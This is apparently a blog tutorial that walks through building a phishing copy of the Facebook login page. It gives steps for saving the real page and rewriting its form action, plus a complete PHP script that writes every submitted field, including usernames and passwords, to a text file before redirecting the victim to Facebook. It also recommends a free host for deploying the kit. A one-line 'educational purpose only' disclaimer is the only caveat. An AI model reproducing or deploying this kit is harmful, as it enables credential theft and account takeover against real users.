I this post today I am gonna show you how to make a fake login page (phishing page) for facebook.
Similar post:
CLICK HERE TO LEARN MAKING PHISHING PAGE FOR YAHOO
It's one of the simplest method to hack a facebook account..You can make a phishing page in four simple steps.
[caution: It's for educational purpose only so please dont try to use it cause it's illegal]
Step1: *Go to facebook.com
*Press ctrl+s and save that page naming it as facebook.html
*Edit the html file you have created with notepad
*Press ctrl+f and search for "action="
*Replace that link with "action.php" shown as below
action="https://www.facebook.com/login.php?login_attempt=1"
action="action.php"
Step2: *Open notepad
*copy and paste the following code:
<?php
header ('Location:https://www.facebook.com/recover.php');
$handle = fopen("hacked.txt", "a");
foreach($_POST as $variable => $value) {
fwrite($handle, $variable);
fwrite($handle, "=");
fwrite($handle, $value);
fwrite($handle, "rn");
}
fwrite($handle, "rn");
fclose($handle);
exit;
?>
*Save that file and name it "action.php". The file should have .php extension.
Step3: Open notepad and save it without writing anything..Name it "hacked.txt".
Step4: Now upload all these files in a free webhosting site.
I recommend you to use my3gb.com
This video guids you to make a phishing page for facebook.I recommend to watch this video if you dont understand or for better understanding...
\Similar post:
CLICK HERE TO LEARN MAKING PHISHING PAGE FOR YAHOO